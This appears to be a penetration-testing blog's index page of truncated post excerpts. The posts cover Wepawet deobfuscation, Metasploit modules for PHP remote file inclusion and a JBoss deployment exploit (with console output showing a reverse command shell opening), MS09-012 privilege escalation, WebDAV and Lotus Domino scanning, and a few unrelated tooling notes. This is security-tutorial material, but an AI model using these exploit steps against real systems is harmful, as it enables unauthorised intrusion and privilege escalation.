Wepawet Deficiency

Hi dudes,

You can find a new paper describing the design of Wepawet. One of my research mates, Daniel, asked the first author about the deobfuscation part. He said: "We do some analysis to recover the clear text of the code. For example, we save the parameters passed to eval and document.write, which is often sufficient to deobfuscate the code. However, we don't currently handle more sophisticated obfuscation techniques (e.g., replace-based ones)." That may be the reason why it does not detect the crimeware.

Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

Abstract:

Exploit Kit Try-out

This is my first post at AttackResearch, and I am thankful to Val and his mates for granting me this opportunity to show you more China-specific threats, attacks and tricks here in the future. I believe you guys will enjoy it.

Using the Metasploit PHP Remote File Include Module

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI.

It's not too complicated to use: set your normal RHOST/RPORT options, set PATH, and set PHPURI to the vulnerable path, putting XXpathXX where you would normally place the URL of your PHP shell. So we take something like the Simple Text-File Login Remote File Include, which has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI:

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

Let's see it in action:

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------

Playing with the MS09-012 Windows Local Exploit

Back in '09 there was a buzz about token kidnapping by Argeniss:
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

It was subsequently patched: http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes, but until the local exploit functionality is added to msf...

The gist is that you can run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privileges you get when exploiting IIS). See the slides for more.

Let's see it in action.

Metasploit jboss deployment file repository exploit

MC pushed out a new exploit today (jboss_deploymentfilerepository).

While it lists 4.x as vulnerable, several other versions are vulnerable as well, including 6.0.0M1 and 5.1.0 :-)

msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

Metasploit Lotus Domino Version Scanner

I pushed out the first of a few Lotus Domino modules I've been working on to the Metasploit trunk last night.

The first one is a Lotus Domino version module.

There is no real "banner grabbing" for Lotus Domino versions: very old versions "may" display the version in the server headers, but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT

More with Metasploit and WebDAV

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial; it's not bad. Make sure you pay attention to the part about giving your IUSR_WHATEVER account write access, or you can set up a Windows account to use authentication.

Metasploit has a few modules to test for WebDAV presence.

webdav_scanner:

msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip:

msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134

Android Emulators with Android Market

I wanted to be able to view/sniff some traffic from my Android phone, mostly to see how "closed" the Gowalla check-in API was (not very).

The first couple of suggestions were to connect the phone to Wi-Fi and check in. Doing this from the comfort of my own home meant checking in from home, and I didn't really want to do that.

Installing the Android emulator is pretty straightforward; the only problem is that it doesn't come with the Android Market or the ability to easily(?) download apps to mess with.

After some Googling I found this post:

http://tech-droid.blogspot.com/2009/11/android-market-on-emulator.html

This enabled me to get a working Android emulator with the Android Market.

Getting Started With IPv6

Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove

Usage:

$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

Buby.kicks_ass? => true

Buby combines two things I use on at least every web application penetration test, if not every penetration test: Burp and Ruby.

I will assume you are familiar with both. If you aren't familiar with Burp, it's the best money you'll spend on a security tool in my opinion. So go get it, install the PortSwigger cert, tweak your config and get to work. See the end of this post for some operational Burp references.

Buby was widely introduced in the Black Hat USA '09 presentation "Ruby for Penetration Testers" by Matasano Security, and is available thanks to the BurpExtender API by PortSwigger and some pretty Ruby by Eric Monti.

Depending on your platform, Buby and some of its sample dependencies can quite literally be a pain in the ass to install: you could be in your seat trying to resolve dependencies for a good portion of your day. So, assuming you've got it running on your platform, let's talk about some of the use cases.